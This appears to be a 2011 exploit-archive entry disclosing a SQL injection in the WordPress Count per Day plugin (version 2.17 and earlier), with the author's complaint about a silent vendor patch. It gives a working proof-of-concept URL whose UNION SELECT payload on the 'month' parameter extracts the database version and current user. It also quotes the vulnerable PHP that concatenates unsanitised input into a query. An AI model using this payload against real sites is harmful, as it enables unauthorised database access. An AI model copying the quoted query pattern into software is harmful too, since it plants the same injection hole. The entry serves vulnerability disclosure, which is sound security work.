WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability
# Published : 2011-09-18
# Author :
# Previous Title : NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF
# Next Title : File disclosure via XEE in SharePoint 2007/2010 and DotNetNuke < 6

# Exploit Title: WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability
# Date: 2011-09-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/count-per-day.2.17.zip
# Version: 2.17 (tested)
# Note: Authors done one of dirtiest things I've seen in a while :)
#       I've warned them 2 weeks ago about the vulnerability
#       They've silently updated the affected v2.17 like nothing happened
#       No mention of "security" fix in Changelog

---
PoC
---
http://www.site.com/wp-content/plugins/count-per-day/notes.php?month=-1 UNION ALL SELECT 1,version(),current_user()--%20

---------------
Vulnerable code
---------------
if ( isset($_POST['month']) )
	$month = $_POST['month']; // they've put (int) here
else if ( isset($_GET['month']) )
	$month = $_GET['month'];  // they've put (int) here
else	
	$month = date_i18n('m');
...
$where = '';
if ( $month )
	$where .= " AND MONTH(date) = $month "; 
if ( $year )
	$where .= " AND YEAR(date) = $year ";
$notes = $wpdb->get_results('SELECT * FROM '.$table_prefix.'cpd_notes WHERE 1 '.$where.' ORDER BY date DESC', ARRAY_A);